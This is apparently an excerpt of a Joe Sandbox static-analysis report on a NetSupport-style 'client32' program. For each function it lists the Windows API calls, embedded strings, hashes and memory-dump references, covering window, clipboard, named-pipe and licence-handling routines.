Instruction ID: 140f5167e9e057dc2eeab5a6682c6ed551ce2348b66d036f089e964fa56279d9
Opcode Fuzzy Hash: 98f8c1f83795b2d2db28a8cc6ab060891feeb056a2029c3e5b65f8357af9b974
Instruction Fuzzy Hash: 0CD1C174B40706ABEB14DB64CC81FAEB7A5AF88708F104518F6169F7C1DAB6F840CB95

Function 111236E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 11123836
FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
IsIconic.USER32(?), ref: 111238C4
InvalidateRect.USER32(?,00000000,00000001), ref: 11123931

Strings

KeepAspect, xrefs: 11123A8F
View, xrefs: 11123A70, 11123A94
ScaleToFit, xrefs: 11123A6B
ignoring WM_TOUCH, xrefs: 11123844

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Iconic$FreeInvalidateLibraryRect
String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
API String ID: 2857465220-3401310001
Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51

Function 110A1460 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON

Download Yara Rule

APIs

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,00000000), ref: 110D15EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetLocalTime.KERNEL32(?), ref: 110A1778

Strings

CLASSID=, xrefs: 110A155B
%s_, xrefs: 110A16A7
IsA(), xrefs: 110A1605, 110A165F, 110A1693, 110A16E8, 110A171C, 110A1811
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110A1600, 110A165A, 110A168E, 110A16E3, 110A1717, 110A180C
[JNL] MakeFileName ret %s, xrefs: 110A1822
_%s, xrefs: 110A1730
_%04d_%02d_%02d_%02d%02d, xrefs: 110A17A6
%s\%s, xrefs: 110A15E1
\/:*?"<>|, xrefs: 110A151F, 110A1596
LESSON=, xrefs: 110A14E0
%s\, xrefs: 110A1633

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 2014016395-1677429133
Opcode ID: c7a89033f4c37a34e976bdb3e5035b4b22ab030669264a707f19a67d2b67c117
Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
Opcode Fuzzy Hash: c7a89033f4c37a34e976bdb3e5035b4b22ab030669264a707f19a67d2b67c117
Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5

Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000,?), ref: 110CB7D9
IsIconic.USER32(00000001), ref: 110CB7E9
GetClientRect.USER32(00000001,?), ref: 110CB7F8
GetSystemMetrics.USER32(00000000), ref: 110CB80D
GetSystemMetrics.USER32(00000001), ref: 110CB814
IsIconic.USER32(00000001), ref: 110CB844
GetWindowRect.USER32(00000001,?), ref: 110CB853
SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_eh, xrefs: 110CB79E
m_hWnd, xrefs: 110CB7C4, 110CB8EC
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CB7BF, 110CB8E7
..\ctl32\nsmdlg.cpp, xrefs: 110CB799

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
API String ID: 2655531791-1552842965
Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90

Function 110F37A0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
GetLastError.KERNEL32 ref: 110F3820
Sleep.KERNEL32(000003E8), ref: 110F383F
CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
LocalFree.KERNEL32(?), ref: 110F386F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

pSD, xrefs: 110F37C5
CreateNamedPipe %s failed, error %d, xrefs: 110F3828
e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
API String ID: 3134831419-838605531
Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795

Function 1115F840 Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 459COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 1115F886
RemovePropA.USER32(?), ref: 1115F8A5
RemovePropA.USER32(?), ref: 1115F8B4
RemovePropA.USER32(?,00000000), ref: 1115F8C3

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

CallWindowProcA.USER32(?,?,?,?,?), ref: 1115FC59

Strings

old_wndproc, xrefs: 1115F85D
..\ctl32\wndclass.cpp, xrefs: 1115F858

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
String ID: ..\ctl32\wndclass.cpp$old_wndproc
API String ID: 1777853711-3305400014
Opcode ID: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
Instruction ID: 2a1ce18ce9ffe677ff7d10ad8131c1a7db68a641085b95e9de3494b6caebac20
Opcode Fuzzy Hash: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
Instruction Fuzzy Hash: 39D18E7530411A9BD748CE69E894EBBB3EAEBC9310B10466EFD56C3781DA31AC1187B1

Function 110336D0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

openclip Error: Cant open clip, xrefs: 110339A2
Sendclip Error: Cant open clip, xrefs: 1103382D
Client, xrefs: 1103375E, 1103386B, 110339FA
DisableClipBoard, xrefs: 11033759, 11033866, 110339F5
CheckClip Error: Can't open clip, e=%d, xrefs: 110337B0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
API String ID: 0-293745777
Opcode ID: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
Opcode Fuzzy Hash: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91

Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
SetForegroundWindow.USER32(00000000), ref: 110934F1

Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982

Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424

Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF

CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531

Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B

CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555

Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE

Strings

NSMFindClassEvent, xrefs: 110934CD, 11093526
NSMClassList, xrefs: 110934E5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
String ID: NSMClassList$NSMFindClassEvent
API String ID: 1622498684-2883797795
Opcode ID: 29ecc446f54fe485b0921c68df6d4683565cdf60394698646c335648b9e5d1e1
Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
Opcode Fuzzy Hash: 29ecc446f54fe485b0921c68df6d4683565cdf60394698646c335648b9e5d1e1
Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5

Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32(?), ref: 11033361
GetClipboardData.USER32(?), ref: 1103337D
GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
GetLastError.KERNEL32 ref: 11033406
GlobalUnlock.KERNEL32(00000000), ref: 11033426

Strings

..\ctl32\clipbrd.cpp, xrefs: 1103334E
pData && pSize, xrefs: 11033353

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
String ID: ..\ctl32\clipbrd.cpp$pData && pSize
API String ID: 1861668072-1296821031
Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90

Function 1115BAE0 Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 1115BB87
ShowWindow.USER32(?,00000009), ref: 1115BB97
BringWindowToTop.USER32(?), ref: 1115BBA1
IsWindow.USER32(00000000), ref: 1115BBE0
IsIconic.USER32(00000000), ref: 1115BBEB
ShowWindow.USER32(00000000,00000009), ref: 1115BBF8
BringWindowToTop.USER32(00000000), ref: 1115BBFF

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$BringIconicShow
String ID:
API String ID: 2588442158-0
Opcode ID: 3a33e4abd410ebbf26273be2ea9a6aaaaf034e705b6e97b22e329d9abcb60bd5
Instruction ID: 1755e30b8fe9c9d7814f56606637c2bfad57bcc5261a6b72e8a72c98849b423b
Opcode Fuzzy Hash: 3a33e4abd410ebbf26273be2ea9a6aaaaf034e705b6e97b22e329d9abcb60bd5
Instruction Fuzzy Hash: 9F312431E006199FDB64CF64CA45BAEF7B8FF49714F00426AE925E3680DB35A941CF98

Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110737B0
_memset.LIBCMT ref: 11073929

Strings

NBCTL32.DLL, xrefs: 11073865
_License, xrefs: 11073771
serial_no, xrefs: 1107376C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90

